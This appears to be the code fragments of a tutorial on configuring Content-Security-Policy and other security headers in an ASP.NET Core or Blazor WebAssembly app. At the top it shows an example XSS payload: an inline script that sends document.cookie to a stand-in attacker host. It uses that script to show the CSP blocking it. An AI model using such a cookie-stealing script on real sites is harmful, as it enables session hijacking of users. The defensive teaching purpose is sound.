Content-Security-Policy: default-src 'self'
<script>location.href="http://attacker.com/Cookies/?c="+encodeURIComponent(document.cookie);</script>
Refused to execute inline script because it violates the following Content Security Policy directive:
"script-src 'self' 'unsafe-eval'". Either the 'unsafe-inline' keyword,
a hash ('sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU='),
or a nonce ('nonce-...') is required to enable inline execution. Content-Security-Policy: default-src 'self'; script-src 'sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU='
<ItemGroup> <PackageReference Include="NetEscapades.AspNetCore.SecurityHeaders" Version="0.20.0" /> </ItemGroup>
public static class SecurityHeadersBuilder
{
public static HeaderPolicyCollection GetCsp(bool isDevelopment)
{
var policy = new HeaderPolicyCollection()
.AddFrameOptionsDeny()
.AddXssProtectionBlock()
.AddContentTypeOptionsNoSniff()
.AddReferrerPolicyStrictOriginWhenCrossOrigin()
.AddCrossOriginOpenerPolicy(builder => builder.SameOrigin())
.AddCrossOriginResourcePolicy(builder => builder.SameOrigin())
.AddCrossOriginEmbedderPolicy(builder => builder.RequireCorp())
.AddContentSecurityPolicy(builder =>
{
builder.AddBaseUri().Self();
builder.AddDefaultSrc().Self().From("blob:");
builder.AddObjectSrc().Self().From("blob:");
builder.AddBlockAllMixedContent();
builder.AddImgSrc().Self().From("data:").From("blob:").From("https:");
builder.AddFontSrc().Self();
builder.AddStyleSrc().Self();
builder.AddFrameAncestors().None();
builder.AddConnectSrc().Self();
builder.AddMediaSrc().Self();
builder.AddScriptSrc().Self()
// Specify any additional hashes to permit your required `non-framework` scripts to load.
.WithHash256("Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU=")
// Specify unsafe-eval to permit the `Blazor WebAssembly Mono runtime` to function.
.UnsafeEval();
//TODO: Add api/CspReport/Log action method ...
// https://www.dntips.ir/post/2706
builder.AddReportUri().To("/api/CspReport/Log");
builder.AddUpgradeInsecureRequests();
})
.RemoveServerHeader()
.AddPermissionsPolicy(builder =>
{
builder.AddAccelerometer().None();
builder.AddAutoplay().None();
builder.AddCamera().None();
builder.AddEncryptedMedia().None();
builder.AddFullscreen().All();
builder.AddGeolocation().None();
builder.AddGyroscope().None();
builder.AddMagnetometer().None();
builder.AddMicrophone().None();
builder.AddMidi().None();
builder.AddPayment().None();
builder.AddPictureInPicture().None();
builder.AddSyncXHR().None();
builder.AddUsb().None();
});
if (!isDevelopment)
{
// maxAge = one year in seconds
policy.AddStrictTransportSecurityMaxAgeIncludeSubDomains();
}
policy.ApplyDocumentHeadersToAllResponses();
return policy;
}
} var app = builder.Build(); // ... var headerPolicyCollection = SecurityHeadersBuilder.GetCsp(app.Environment.IsDevelopment()); app.UseSecurityHeaders(headerPolicyCollection); app.UseHttpsRedirection(); // ...
Content-Security-Policy:base-uri 'self'; default-src 'self' blob:; object-src 'self' blob:; block-all-mixed-content; img-src 'self' data: blob: https:; font-src 'self'; style-src 'self'; frame-ancestors 'none'; connect-src 'self'; media-src 'self'; script-src 'self' 'sha256-Rx2R8WNQO+B6FPfeIU/11a0BScUM6Cq7HdThUsPpjOU=' 'unsafe-eval'; report-uri /api/CspReport/Log; upgrade-insecure-requests Cross-Origin-Embedder-Policy:require-corp Cross-Origin-Opener-Policy:same-origin Cross-Origin-Resource-Policy:same-origin Permissions-Policy:accelerometer=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=*, geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), sync-xhr=(), usb=() Referrer-Policy:strict-origin-when-cross-origin X-Content-Type-Options:nosniff X-Frame-Options:DENY X-Xss-Protection:1; mode=block
http://localhost:51095/Home/Index
ngrok http [port] -host-header="localhost:[port]"
http://127.0.0.1:4040
